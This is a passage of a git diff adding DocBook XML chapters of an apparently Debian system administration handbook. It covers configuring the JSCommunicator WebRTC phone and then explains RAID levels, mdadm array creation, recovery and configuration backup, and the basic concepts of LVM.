+				JSCommunicator is a generic, unbranded WebRTC phone that does not require any server-side scripting such as PHP. It is built exclusively with HTML, CSS and JavaScript. It is the basis for many other WebRTC services and modules for more advanced web publishing frameworks. <ulink type="block" url="http://jscommunicator.org" />
+			</para>
+			 <indexterm>
+				<primary>JSCommunicator</primary>
+			</indexterm>
+			 <para>
+				The package <emphasis role="pkg">jscommunicator-web-phone</emphasis> is the quickest way to install a WebRTC phone into a web site. It requires a SIP proxy with a WebSocket transport. The instructions in <xref linkend="sect.sip-server-install" /> include the necessary details to enable the WebSocket transport in the <emphasis role="pkg">repro</emphasis> SIP proxy.
+			</para>
+			 <para>
+				After installing <emphasis role="pkg">jscommunicator-web-phone</emphasis>, there are various ways to use it. A simple strategy is to include or copy the configuration from <filename>/etc/jscommunicator-web-phone/apache.conf</filename> into an Apache virtual host configuration.
+			</para>
+			 <para>
+				Once the web-phone files are available in the web server, customize the <filename>/etc/jscommunicator-web-phone/config.js</filename> to point at the TURN server and SIP proxy. For example:
+			</para>
+			 
+<programlisting>
+JSCommSettings = {
+
+  // Web server environment
+  webserver: {
+    url_prefix: null            // If set, prefix used to construct sound/ URLs
+  },
+
+  // STUN/TURN media relays
+  stun_servers: [],
+  turn_servers: [
+    { server:"turn:turn-server.falcot.com?transport=udp", username:"joe", password:"j0Ep455d" }
+  ],
+
+  // WebSocket connection
+  websocket: {
+      // Notice we use the falcot.com domain certificate and port 8443
+      // This matches the Transport3 and Transport4 example in
+      // the falcot.com repro.config file
+    servers: 'wss://falcot.com:8443',
+    connection_recovery_min_interval: 2,
+    connection_recovery_max_interval: 30
+  },
+
+  ...
+</programlisting>
+			 <para>
+				More advanced click-to-call web sites typically use server-side scripting to generate the <literal>config.js</literal> file dynamically. The <ulink url="http://drucall.org">DruCall</ulink> source code demonstrates how to do this with PHP.
+			</para>
+			 <indexterm>
+				<primary>DruCall</primary>
+			</indexterm>
+			 <para>
+				This chapter sampled only a fraction of the available server software; however, most of the common network services were described. Now it is time for an even more technical chapter: we'll go into deeper detail for some concepts, describe massive deployments and virtualization.
+			</para>
+
+		</section>
+
+	</section>
+</chapter>
+
diff --git a/tmp/cs-CZ/xml/12_advanced-administration.xml b/tmp/cs-CZ/xml/12_advanced-administration.xml
new file mode 100644
index 000000000..ed7454f9d
--- /dev/null
+++ b/tmp/cs-CZ/xml/12_advanced-administration.xml
@@ -0,0 +1,2455 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="advanced-administration" lang="cs-CZ">
+	<chapterinfo>
+		 <keywordset>
+			<keyword>RAID</keyword>
+			 <keyword>LVM</keyword>
+			 <keyword>FAI</keyword>
+			 <keyword>Preseeding</keyword>
+			 <keyword>Monitoring</keyword>
+			 <keyword>Virtualization</keyword>
+			 <keyword>Xen</keyword>
+			 <keyword>LXC</keyword>
+
+		</keywordset>
+
+	</chapterinfo>
+	 <title>Advanced Administration</title>
+	 <highlights> <para>
+		This chapter revisits some aspects we already described, with a different perspective: instead of installing one single computer, we will study mass-deployment systems; instead of creating RAID or LVM volumes at install time, we'll learn to do it by hand so we can later revise our initial choices. Finally, we will discuss monitoring tools and virtualization techniques. As a consequence, this chapter is more particularly targeting professional administrators, and focuses somewhat less on individuals responsible for their home network.
+	</para>
+	 </highlights> <section id="sect.raid-and-lvm">
+		<title>RAID and LVM</title>
+		 <para>
+			<xref linkend="installation" /> presented these technologies from the point of view of the installer, and how it integrated them to make their deployment easy from the start. After the initial installation, an administrator must be able to handle evolving storage space needs without having to resort to an expensive reinstallation. They must therefore understand the required tools for manipulating RAID and LVM volumes.
+		</para>
+		 <para>
+			RAID and LVM are both techniques to abstract the mounted volumes from their physical counterparts (actual hard-disk drives or partitions thereof); the former secures the data against hardware failure by introducing redundancy, the latter makes volume management more flexible and independent of the actual size of the underlying disks. In both cases, the system ends up with new block devices, which can be used to create filesystems or swap space, without necessarily having them mapped to one physical disk. RAID and LVM come from quite different backgrounds, but their functionality can overlap somewhat, which is why they are often mentioned together.
+		</para>
+		 <sidebar> <title><emphasis>PERSPECTIVE</emphasis> Btrfs combines LVM and RAID</title>
+		 <para>
+			While LVM and RAID are two distinct kernel subsystems that come between the disk block devices and their filesystems, <emphasis>btrfs</emphasis> is a new filesystem, initially developed at Oracle, that purports to combine the featuresets of LVM and RAID and much more. It is mostly functional, and although it is still tagged “experimental” because its development is incomplete (some features aren't implemented yet), it has already seen some use in production environments. <ulink type="block" url="http://btrfs.wiki.kernel.org/" />
+		</para>
+		 <para>
+			Among the noteworthy features are the ability to take a snapshot of a filesystem tree at any point in time. This snapshot copy doesn't initially use any disk space, the data only being duplicated when one of the copies is modified. The filesystem also handles transparent compression of files, and checksums ensure the integrity of all stored data.
+		</para>
+		 </sidebar> <para>
+			In both the RAID and LVM cases, the kernel provides a block device file, similar to the ones corresponding to a hard disk drive or a partition. When an application, or another part of the kernel, requires access to a block of such a device, the appropriate subsystem routes the block to the relevant physical layer. Depending on the configuration, this block can be stored on one or several physical disks, and its physical location may not be directly correlated to the location of the block in the logical device.
+		</para>
+		 <section id="sect.raid-soft">
+			<title>Software RAID</title>
+			 <indexterm>
+				<primary>RAID</primary>
+			</indexterm>
+			 <para>
+				RAID means <emphasis>Redundant Array of Independent Disks</emphasis>. The goal of this system is to prevent data loss in case of hard disk failure. The general principle is quite simple: data are stored on several physical disks instead of only one, with a configurable level of redundancy. Depending on this amount of redundancy, and even in the event of an unexpected disk failure, data can be losslessly reconstructed from the remaining disks.
+			</para>
+			 <sidebar> <title><emphasis>CULTURE</emphasis> <foreignphrase>Independent</foreignphrase> or <foreignphrase>inexpensive</foreignphrase>?</title>
+			 <para>
+				The I in RAID initially stood for <emphasis>inexpensive</emphasis>, because RAID allowed a drastic increase in data safety without requiring investing in expensive high-end disks. Probably due to image concerns, however, it is now more customarily considered to stand for <emphasis>independent</emphasis>, which doesn't have the unsavory flavour of cheapness.
+			</para>
+			 </sidebar> <para>
+				RAID can be implemented either by dedicated hardware (RAID modules integrated into SCSI or SATA controller cards) or by software abstraction (the kernel). Whether hardware or software, a RAID system with enough redundancy can transparently stay operational when a disk fails; the upper layers of the stack (applications) can even keep accessing the data in spite of the failure. Of course, this “degraded mode” can have an impact on performance, and redundancy is reduced, so a further disk failure can lead to data loss. In practice, therefore, one will strive to only stay in this degraded mode for as long as it takes to replace the failed disk. Once the new disk is in place, the RAID system can reconstruct the required data so as to return to a safe mode. The applications won't notice anything, apart from potentially reduced access speed, while the array is in degraded mode or during the reconstruction phase.
+			</para>
+			 <para>
+				When RAID is implemented by hardware, its configuration generally happens within the BIOS setup tool, and the kernel will consider a RAID array as a single disk, which will work as a standard physical disk, although the device name may be different (depending on the driver).
+			</para>
+			 <para>
+				We only focus on software RAID in this book.
+			</para>
+			 <section id="sect.raid-levels">
+				<title>Different RAID Levels</title>
+				 <para>
+					RAID is actually not a single system, but a range of systems identified by their levels; the levels differ by their layout and the amount of redundancy they provide. The more redundant, the more failure-proof, since the system will be able to keep working with more failed disks. The counterpart is that the usable space shrinks for a given set of disks; seen the other way, more disks will be needed to store a given amount of data.
+				</para>
+				 <variablelist>
+					<varlistentry>
+						<term>Linear RAID</term>
+						 <listitem>
+							<para>
+								Even though the kernel's RAID subsystem allows creating “linear RAID”, this is not proper RAID, since this setup doesn't involve any redundancy. The kernel merely aggregates several disks end-to-end and provides the resulting aggregated volume as one virtual disk (one block device). That's about its only function. This setup is rarely used by itself (see later for the exceptions), especially since the lack of redundancy means that one disk failing makes the whole aggregate, and therefore all the data, unavailable.
+							</para>
+
+						</listitem>
+
+					</varlistentry>
+					 <varlistentry>
+						<term>RAID-0</term>
+						 <listitem>
+							<para>
+								This level doesn't provide any redundancy either, but disks aren't simply stuck on end one after another: they are divided in <emphasis>stripes</emphasis>, and the blocks on the virtual device are stored on stripes on alternating physical disks. In a two-disk RAID-0 setup, for instance, even-numbered blocks of the virtual device will be stored on the first physical disk, while odd-numbered blocks will end up on the second physical disk.
+							</para>
+							 <para>
+								This system doesn't aim at increasing reliability, since (as in the linear case) the availability of all the data is jeopardized as soon as one disk fails, but at increasing performance: during sequential access to large amounts of contiguous data, the kernel will be able to read from both disks (or write to them) in parallel, which increases the data transfer rate. However, RAID-0 use is shrinking, its niche being filled by LVM (see later).
+							</para>
+
+						</listitem>
+
+					</varlistentry>
+					 <varlistentry>
+						<term>RAID-1</term>
+						 <listitem>
+							<para>
+								This level, also known as “RAID mirroring”, is both the simplest and the most widely used setup. In its standard form, it uses two physical disks of the same size, and provides a logical volume of the same size again. Data are stored identically on both disks, hence the “mirror” nickname. When one disk fails, the data is still available on the other. For really critical data, RAID-1 can of course be set up on more than two disks, with a direct impact on the ratio of hardware cost versus available payload space.
+							</para>
+							 <sidebar> <title><emphasis>NOTE</emphasis> Disks and cluster sizes</title>
+							 <para>
+								If two disks of different sizes are set up in a mirror, the bigger one will not be fully used, since it will contain the same data as the smallest one and nothing more. The useful available space provided by a RAID-1 volume therefore matches the size of the smallest disk in the array. This still holds for RAID volumes with a higher RAID level, even though redundancy is stored differently.
+							</para>
+							 <para>
+								It is therefore important, when setting up RAID arrays (except for RAID-0 and “linear RAID”), to only assemble disks of identical, or very close, sizes, to avoid wasting resources.
+							</para>
+							 </sidebar> <sidebar> <title><emphasis>NOTE</emphasis> Spare disks</title>
+							 <para>
+								RAID levels that include redundancy allow assigning more disks than required to an array. The extra disks are used as spares when one of the main disks fails. For instance, in a mirror of two disks plus one spare, if one of the first two disks fails, the kernel will automatically (and immediately) reconstruct the mirror using the spare disk, so that redundancy stays assured after the reconstruction time. This can be used as another kind of safeguard for critical data.
+							</para>
+							 <para>
+								One would be forgiven for wondering how this is better than simply mirroring on three disks to start with. The advantage of the “spare disk” configuration is that the spare disk can be shared across several RAID volumes. For instance, one can have three mirrored volumes, with redundancy assured even in the event of one disk failure, with only seven disks (three pairs, plus one shared spare), instead of the nine disks that would be required by three triplets.
+							</para>
+							 </sidebar> <para>
+								This RAID level, although expensive (since only half of the physical storage space, at best, is useful), is widely used in practice. It is simple to understand, and it allows very simple backups: since both disks have identical contents, one of them can be temporarily extracted with no impact on the working system. Read performance is often increased since the kernel can read half of the data on each disk in parallel, while write performance isn't too severely degraded. In case of a RAID-1 array of N disks, the data stays available even with N-1 disk failures.
+							</para>
+
+						</listitem>
+
+					</varlistentry>
+					 <varlistentry>
+						<term>RAID-4</term>
+						 <listitem>
+							<para>
+								This RAID level, not widely used, uses N disks to store useful data, and an extra disk to store redundancy information. If that disk fails, the system can reconstruct its contents from the other N. If one of the N data disks fails, the remaining N-1 combined with the “parity” disk contain enough information to reconstruct the required data.
+							</para>
+							 <para>
+								RAID-4 isn't too expensive since it only involves a one-in-N increase in costs and has no noticeable impact on read performance, but writes are slowed down. Furthermore, since a write to any of the N disks also involves a write to the parity disk, the latter sees many more writes than the former, and its lifespan can shorten dramatically as a consequence. Data on a RAID-4 array is safe only up to one failed disk (of the N+1).
+							</para>
+
+						</listitem>
+
+					</varlistentry>
+					 <varlistentry>
+						<term>RAID-5</term>
+						 <listitem>
+							<para>
+								RAID-5 addresses the asymmetry issue of RAID-4: parity blocks are spread over all of the N+1 disks, with no single disk having a particular role.
+							</para>
+							 <para>
+								Read and write performance are identical to RAID-4. Here again, the system stays functional with up to one failed disk (of the N+1), but no more.
+							</para>
+
+						</listitem>
+
+					</varlistentry>
+					 <varlistentry>
+						<term>RAID-6</term>
+						 <listitem>
+							<para>
+								RAID-6 can be considered an extension of RAID-5, where each series of N blocks involves two redundancy blocks, and each such series of N+2 blocks is spread over N+2 disks.
+							</para>
+							 <para>
+								This RAID level is slightly more expensive than the previous two, but it brings some extra safety since up to two drives (of the N+2) can fail without compromising data availability. The counterpart is that write operations now involve writing one data block and two redundancy blocks, which makes them even slower.
+							</para>
+
+						</listitem>
+
+					</varlistentry>
+					 <varlistentry>
+						<term>RAID-1+0</term>
+						 <listitem>
+							<para>
+								This isn't strictly speaking, a RAID level, but a stacking of two RAID groupings. Starting from 2×N disks, one first sets them up by pairs into N RAID-1 volumes; these N volumes are then aggregated into one, either by “linear RAID” or (increasingly) by LVM. This last case goes farther than pure RAID, but there's no problem with that.
+							</para>
+							 <para>
+								RAID-1+0 can survive multiple disk failures: up to N in the 2×N array described above, provided that at least one disk keeps working in each of the RAID-1 pairs.
+							</para>
+							 <sidebar id="sidebar.raid-10"> <title><emphasis>GOING FURTHER</emphasis> RAID-10</title>
+							 <para>
+								RAID-10 is generally considered a synonym of RAID-1+0, but a Linux specificity makes it actually a generalization. This setup allows a system where each block is stored on two different disks, even with an odd number of disks, the copies being spread out along a configurable model.
+							</para>
+							 <para>
+								Performances will vary depending on the chosen repartition model and redundancy level, and of the workload of the logical volume.
+							</para>
+							 </sidebar>
+						</listitem>
+
+					</varlistentry>
+
+				</variablelist>
+				 <para>
+					Obviously, the RAID level will be chosen according to the constraints and requirements of each application. Note that a single computer can have several distinct RAID arrays with different configurations.
+				</para>
+
+			</section>
+			 <section id="sect.raid-setup">
+				<title>Setting up RAID</title>
+				 <indexterm>
+					<primary><emphasis role="pkg">mdadm</emphasis></primary>
+				</indexterm>
+				 <para>
+					Setting up RAID volumes requires the <emphasis role="pkg">mdadm</emphasis> package; it provides the <command>mdadm</command> command, which allows creating and manipulating RAID arrays, as well as scripts and tools integrating it to the rest of the system, including the monitoring system.
+				</para>
+				 <para>
+					Our example will be a server with a number of disks, some of which are already used, the rest being available to setup RAID. We initially have the following disks and partitions:
+				</para>
+				 <itemizedlist>
+					<listitem>
+						<para>
+							the <filename>sdb</filename> disk, 4 GB, is entirely available;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							the <filename>sdc</filename> disk, 4 GB, is also entirely available;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							on the <filename>sdd</filename> disk, only partition <filename>sdd2</filename> (about 4 GB) is available;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							finally, a <filename>sde</filename> disk, still 4 GB, entirely available.
+						</para>
+
+					</listitem>
+
+				</itemizedlist>
+				 <sidebar> <title><emphasis>NOTE</emphasis> Identifying existing RAID volumes</title>
+				 <para>
+					The <filename>/proc/mdstat</filename> file lists existing volumes and their states. When creating a new RAID volume, care should be taken not to name it the same as an existing volume.
+				</para>
+				 </sidebar> <para>
+					We're going to use these physical elements to build two volumes, one RAID-0 and one mirror (RAID-1). Let's start with the RAID-0 volume:
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>mdadm --create /dev/md0 --level=0 --raid-devices=2 /dev/sdb /dev/sdc</userinput>
+<computeroutput>mdadm: Defaulting to version 1.2 metadata
+mdadm: array /dev/md0 started.
+# </computeroutput><userinput>mdadm --query /dev/md0</userinput>
+<computeroutput>/dev/md0: 8.00GiB raid0 2 devices, 0 spares. Use mdadm --detail for more detail.
+# </computeroutput><userinput>mdadm --detail /dev/md0</userinput>
+<computeroutput>/dev/md0:
+        Version : 1.2
+  Creation Time : Wed May  6 09:24:34 2015
+     Raid Level : raid0
+     Array Size : 8387584 (8.00 GiB 8.59 GB)
+   Raid Devices : 2
+  Total Devices : 2
+    Persistence : Superblock is persistent
+
+    Update Time : Wed May  6 09:24:34 2015
+          State : clean 
+ Active Devices : 2
+Working Devices : 2
+ Failed Devices : 0
+  Spare Devices : 0
+
+     Chunk Size : 512K
+
+           Name : mirwiz:0  (local to host mirwiz)
+           UUID : bb085b35:28e821bd:20d697c9:650152bb
+         Events : 0
+
+    Number   Major   Minor   RaidDevice State
+       0       8       16        0      active sync   /dev/sdb
+       1       8       32        1      active sync   /dev/sdc
+# </computeroutput><userinput>mkfs.ext4 /dev/md0</userinput>
+<computeroutput>mke2fs 1.42.12 (29-Aug-2014)
+Creating filesystem with 2095104 4k blocks and 524288 inodes
+Filesystem UUID: fff08295-bede-41a9-9c6a-8c7580e520a6
+Superblock backups stored on blocks: 
+        32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632
+
+Allocating group tables: done                            
+Writing inode tables: done                            
+Creating journal (32768 blocks): done
+Writing superblocks and filesystem accounting information: done 
+# </computeroutput><userinput>mkdir /srv/raid-0</userinput>
+<computeroutput># </computeroutput><userinput>mount /dev/md0 /srv/raid-0</userinput>
+<computeroutput># </computeroutput><userinput>df -h /srv/raid-0</userinput>
+<computeroutput>Filesystem      Size  Used Avail Use% Mounted on
+/dev/md0        7.9G   18M  7.4G   1% /srv/raid-0
+</computeroutput></screen>
+				 <para>
+					The <command>mdadm --create</command> command requires several parameters: the name of the volume to create (<filename>/dev/md*</filename>, with MD standing for <foreignphrase>Multiple Device</foreignphrase>), the RAID level, the number of disks (which is compulsory despite being mostly meaningful only with RAID-1 and above), and the physical drives to use. Once the device is created, we can use it like we'd use a normal partition, create a filesystem on it, mount that filesystem, and so on. Note that our creation of a RAID-0 volume on <filename>md0</filename> is nothing but coincidence, and the numbering of the array doesn't need to be correlated to the chosen amount of redundancy. It's also possible to create named RAID arrays, by giving <command>mdadm</command> parameters such as <filename>/dev/md/linear</filename> instead of <filename>/dev/md0</filename>.
+				</para>
+				 <para>
+					Creation of a RAID-1 follows a similar fashion, the differences only being noticeable after the creation:
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>mdadm --create /dev/md1 --level=1 --raid-devices=2 /dev/sdd2 /dev/sde</userinput>
+<computeroutput>mdadm: Note: this array has metadata at the start and
+    may not be suitable as a boot device.  If you plan to
+    store '/boot' on this device please ensure that
+    your boot-loader understands md/v1.x metadata, or use
+    --metadata=0.90
+mdadm: largest drive (/dev/sdd2) exceeds size (4192192K) by more than 1%
+Continue creating array? </computeroutput><userinput>y</userinput>
+<computeroutput>mdadm: Defaulting to version 1.2 metadata
+mdadm: array /dev/md1 started.
+# </computeroutput><userinput>mdadm --query /dev/md1</userinput>
+<computeroutput>/dev/md1: 4.00GiB raid1 2 devices, 0 spares. Use mdadm --detail for more detail.
+# </computeroutput><userinput>mdadm --detail /dev/md1</userinput>
+<computeroutput>/dev/md1:
+        Version : 1.2
+  Creation Time : Wed May  6 09:30:19 2015
+     Raid Level : raid1
+     Array Size : 4192192 (4.00 GiB 4.29 GB)
+  Used Dev Size : 4192192 (4.00 GiB 4.29 GB)
+   Raid Devices : 2
+  Total Devices : 2
+    Persistence : Superblock is persistent
+
+    Update Time : Wed May  6 09:30:40 2015
+          State : clean, resyncing (PENDING) 
+ Active Devices : 2
+Working Devices : 2
+ Failed Devices : 0
+  Spare Devices : 0
+
+           Name : mirwiz:1  (local to host mirwiz)
+           UUID : 6ec558ca:0c2c04a0:19bca283:95f67464
+         Events : 0
+
+    Number   Major   Minor   RaidDevice State
+       0       8       50        0      active sync   /dev/sdd2
+       1       8       64        1      active sync   /dev/sde
+# </computeroutput><userinput>mdadm --detail /dev/md1</userinput>
+<computeroutput>/dev/md1:
+[...]
+          State : clean
+[...]
+</computeroutput></screen>
+				 <sidebar> <title><emphasis>TIP</emphasis> RAID, disks and partitions</title>
+				 <para>
+					As illustrated by our example, RAID devices can be constructed out of disk partitions, and do not require full disks.
+				</para>
+				 </sidebar> <para>
+					A few remarks are in order. First, <command>mdadm</command> notices that the physical elements have different sizes; since this implies that some space will be lost on the bigger element, a confirmation is required.
+				</para>
+				 <para>
+					More importantly, note the state of the mirror. The normal state of a RAID mirror is that both disks have exactly the same contents. However, nothing guarantees this is the case when the volume is first created. The RAID subsystem will therefore provide that guarantee itself, and there will be a synchronization phase as soon as the RAID device is created. After some time (the exact amount will depend on the actual size of the disks…), the RAID array switches to the “active” or “clean” state. Note that during this reconstruction phase, the mirror is in a degraded mode, and redundancy isn't assured. A disk failing during that risk window could lead to losing all the data. Large amounts of critical data, however, are rarely stored on a freshly created RAID array before its initial synchronization. Note that even in degraded mode, the <filename>/dev/md1</filename> is usable, and a filesystem can be created on it, as well as some data copied on it.
+				</para>
+				 <sidebar> <title><emphasis>TIP</emphasis> Starting a mirror in degraded mode</title>
+				 <para>
+					Sometimes two disks are not immediately available when one wants to start a RAID-1 mirror, for instance because one of the disks one plans to include is already used to store the data one wants to move to the array. In such circumstances, it is possible to deliberately create a degraded RAID-1 array by passing <filename>missing</filename> instead of a device file as one of the arguments to <command>mdadm</command>. Once the data have been copied to the “mirror”, the old disk can be added to the array. A synchronization will then take place, giving us the redundancy that was wanted in the first place.
+				</para>
+				 </sidebar> <sidebar> <title><emphasis>TIP</emphasis> Setting up a mirror without synchronization</title>
+				 <para>
+					RAID-1 volumes are often created to be used as a new disk, often considered blank. The actual initial contents of the disk is therefore not very relevant, since one only needs to know that the data written after the creation of the volume, in particular the filesystem, can be accessed later.
+				</para>
+				 <para>
+					One might therefore wonder about the point of synchronizing both disks at creation time. Why care whether the contents are identical on zones of the volume that we know will only be read after we have written to them?
+				</para>
+				 <para>
+					Fortunately, this synchronization phase can be avoided by passing the <literal>--assume-clean</literal> option to <command>mdadm</command>. However, this option can lead to surprises in cases where the initial data will be read (for instance if a filesystem is already present on the physical disks), which is why it isn't enabled by default.
+				</para>
+				 </sidebar> <para>
+					Now let's see what happens when one of the elements of the RAID-1 array fails. <command>mdadm</command>, in particular its <literal>--fail</literal> option, allows simulating such a disk failure:
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>mdadm /dev/md1 --fail /dev/sde</userinput>
+<computeroutput>mdadm: set /dev/sde faulty in /dev/md1
+# </computeroutput><userinput>mdadm --detail /dev/md1</userinput>
+<computeroutput>/dev/md1:
+[...]
+    Update Time : Wed May  6 09:39:39 2015
+          State : clean, degraded 
+ Active Devices : 1
+Working Devices : 1
+ Failed Devices : 1
+  Spare Devices : 0
+
+           Name : mirwiz:1  (local to host mirwiz)
+           UUID : 6ec558ca:0c2c04a0:19bca283:95f67464
+         Events : 19
+
+    Number   Major   Minor   RaidDevice State
+       0       8       50        0      active sync   /dev/sdd2
+       2       0        0        2      removed
+
+       1       8       64        -      faulty   /dev/sde</computeroutput></screen>
+				 <para>
+					The contents of the volume are still accessible (and, if it is mounted, the applications don't notice a thing), but the data safety isn't assured anymore: should the <filename>sdd</filename> disk fail in turn, the data would be lost. We want to avoid that risk, so we'll replace the failed disk with a new one, <filename>sdf</filename>:
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>mdadm /dev/md1 --add /dev/sdf</userinput>
+<computeroutput>mdadm: added /dev/sdf
+# </computeroutput><userinput>mdadm --detail /dev/md1</userinput>
+<computeroutput>/dev/md1:
+[...]
+   Raid Devices : 2
+  Total Devices : 3
+    Persistence : Superblock is persistent
+
+    Update Time : Wed May  6 09:48:49 2015
+          State : clean, degraded, recovering 
+ Active Devices : 1
+Working Devices : 2
+ Failed Devices : 1
+  Spare Devices : 1
+
+ Rebuild Status : 28% complete
+
+           Name : mirwiz:1  (local to host mirwiz)
+           UUID : 6ec558ca:0c2c04a0:19bca283:95f67464
+         Events : 26
+
+    Number   Major   Minor   RaidDevice State
+       0       8       50        0      active sync   /dev/sdd2
+       2       8       80        1      spare rebuilding   /dev/sdf
+
+       1       8       64        -      faulty   /dev/sde
+# </computeroutput><userinput>[...]</userinput>
+<computeroutput>[...]
+# </computeroutput><userinput>mdadm --detail /dev/md1</userinput>
+<computeroutput>/dev/md1:
+[...]
+    Update Time : Wed May  6 09:49:08 2015
+          State : clean 
+ Active Devices : 2
+Working Devices : 2
+ Failed Devices : 1
+  Spare Devices : 0
+
+           Name : mirwiz:1  (local to host mirwiz)
+           UUID : 6ec558ca:0c2c04a0:19bca283:95f67464
+         Events : 41
+
+    Number   Major   Minor   RaidDevice State
+       0       8       50        0      active sync   /dev/sdd2
+       2       8       80        1      active sync   /dev/sdf
+
+       1       8       64        -      faulty   /dev/sde</computeroutput></screen>
+				 <para>
+					Here again, the kernel automatically triggers a reconstruction phase during which the volume, although still accessible, is in a degraded mode. Once the reconstruction is over, the RAID array is back to a normal state. One can then tell the system that the <filename>sde</filename> disk is about to be removed from the array, so as to end up with a classical RAID mirror on two disks:
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>mdadm /dev/md1 --remove /dev/sde</userinput>
+<computeroutput>mdadm: hot removed /dev/sde from /dev/md1
+# </computeroutput><userinput>mdadm --detail /dev/md1</userinput>
+<computeroutput>/dev/md1:
+[...]
+    Number   Major   Minor   RaidDevice State
+       0       8       50        0      active sync   /dev/sdd2
+       2       8       80        1      active sync   /dev/sdf</computeroutput></screen>
+				 <para>
+					From then on, the drive can be physically removed when the server is next switched off, or even hot-removed when the hardware configuration allows hot-swap. Such configurations include some SCSI controllers, most SATA disks, and external drives operating on USB or Firewire.
+				</para>
+
+			</section>
+			 <section id="sect.backup-raid-config">
+				<title>Backing up the Configuration</title>
+				 <para>
+					Most of the meta-data concerning RAID volumes are saved directly on the disks that make up these arrays, so that the kernel can detect the arrays and their components and assemble them automatically when the system starts up. However, backing up this configuration is encouraged, because this detection isn't fail-proof, and it is only expected that it will fail precisely in sensitive circumstances. In our example, if the <filename>sde</filename> disk failure had been real (instead of simulated) and the system had been restarted without removing this <filename>sde</filename> disk, this disk could start working again due to having been probed during the reboot. The kernel would then have three physical elements, each claiming to contain half of the same RAID volume. Another source of confusion can come when RAID volumes from two servers are consolidated onto one server only. If these arrays were running normally before the disks were moved, the kernel would be able to detect and reassemble the pairs properly; but if the moved disks had been aggregated into an <filename>md1</filename> on the old server, and the new server already has an <filename>md1</filename>, one of the mirrors would be renamed.
+				</para>
+				 <para>
+					Backing up the configuration is therefore important, if only for reference. The standard way to do it is by editing the <filename>/etc/mdadm/mdadm.conf</filename> file, an example of which is listed here:
+				</para>
+				 <example id="example.mdadm-conf">
+					<title><command>mdadm</command> configuration file</title>
+					 
+<programlisting># mdadm.conf
+#
+# Please refer to mdadm.conf(5) for information about this file.
+#
+
+# by default (built-in), scan all partitions (/proc/partitions) and all
+# containers for MD superblocks. alternatively, specify devices to scan, using
+# wildcards if desired.
+DEVICE /dev/sd*
+
+# auto-create devices with Debian standard permissions
+CREATE owner=root group=disk mode=0660 auto=yes
+
+# automatically tag new arrays as belonging to the local system
+HOMEHOST &lt;system&gt;
+
+# instruct the monitoring daemon where to send mail alerts
+MAILADDR root
+
+# definitions of existing MD arrays
+ARRAY /dev/md0 metadata=1.2 name=mirwiz:0 UUID=bb085b35:28e821bd:20d697c9:650152bb
+ARRAY /dev/md1 metadata=1.2 name=mirwiz:1 UUID=6ec558ca:0c2c04a0:19bca283:95f67464
+
+# This configuration was auto-generated on Thu, 17 Jan 2013 16:21:01 +0100
+# by mkconf 3.2.5-3
+</programlisting>
+
+				</example>
+				 <para>
+					One of the most useful details is the <literal>DEVICE</literal> option, which lists the devices where the system will automatically look for components of RAID volumes at start-up time. In our example, we replaced the default value, <literal>partitions containers</literal>, with an explicit list of device files, since we chose to use entire disks and not only partitions, for some volumes.
+				</para>
+				 <para>
+					The last two lines in our example are those allowing the kernel to safely pick which volume number to assign to which array. The metadata stored on the disks themselves are enough to re-assemble the volumes, but not to determine the volume number (and the matching <filename>/dev/md*</filename> device name).
+				</para>
+				 <para>
+					Fortunately, these lines can be generated automatically:
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>mdadm --misc --detail --brief /dev/md?</userinput>
+<computeroutput>ARRAY /dev/md0 metadata=1.2 name=mirwiz:0 UUID=bb085b35:28e821bd:20d697c9:650152bb
+ARRAY /dev/md1 metadata=1.2 name=mirwiz:1 UUID=6ec558ca:0c2c04a0:19bca283:95f67464</computeroutput></screen>
+				 <para>
+					The contents of these last two lines doesn't depend on the list of disks included in the volume. It is therefore not necessary to regenerate these lines when replacing a failed disk with a new one. On the other hand, care must be taken to update the file when creating or deleting a RAID array.
+				</para>
+
+			</section>
+
+		</section>
+		 <section id="sect.lvm">
+			<title>LVM</title>
+			 <indexterm>
+				<primary>LVM</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Logical Volume Manager</primary>
+			</indexterm>
+			 <para>
+				LVM, the <emphasis>Logical Volume Manager</emphasis>, is another approach to abstracting logical volumes from their physical supports, which focuses on increasing flexibility rather than increasing reliability. LVM allows changing a logical volume transparently as far as the applications are concerned; for instance, it is possible to add new disks, migrate the data to them, and remove the old disks, without unmounting the volume.
+			</para>
+			 <section id="sect.lvm-concepts">
+				<title>LVM Concepts</title>
+				 <para>
+					This flexibility is attained by a level of abstraction involving three concepts.
+				</para>
+				 <para>
+					First, the PV (<emphasis>Physical Volume</emphasis>) is the entity closest to the hardware: it can be partitions on a disk, or a full disk, or even any other block device (including, for instance, a RAID array). Note that when a physical element is set up to be a PV for LVM, it should only be accessed via LVM, otherwise the system will get confused.
+				</para>
+				 <para>
+					A number of PVs can be clustered in a VG (<emphasis>Volume Group</emphasis>), which can be compared to disks both virtual and extensible. VGs are abstract, and don't appear in a device file in the <filename>/dev</filename> hierarchy, so there's no risk of using them directly.
+				</para>
+				 <para>
+					The third kind of object is the LV (<emphasis>Logical Volume</emphasis>), which is a chunk of a VG; if we keep the VG-as-disk analogy, the LV compares to a partition. The LV appears as a block device with an entry in <filename>/dev</filename>, and it can be used as any other physical partition can be (most commonly, to host a filesystem or swap space).
+				</para>
+				 <para>
+					The important thing is that the splitting of a VG into LVs is entirely independent of its physical components (the PVs). A VG with only a single physical component (a disk for instance) can be split into a dozen logical volumes; similarly, a VG can use several physical disks and appear as a single large logical volume. The only constraint, obviously, is that the total size allocated to LVs can't be bigger than the total capacity of the PVs in the volume group.
+				</para>
+				 <para>
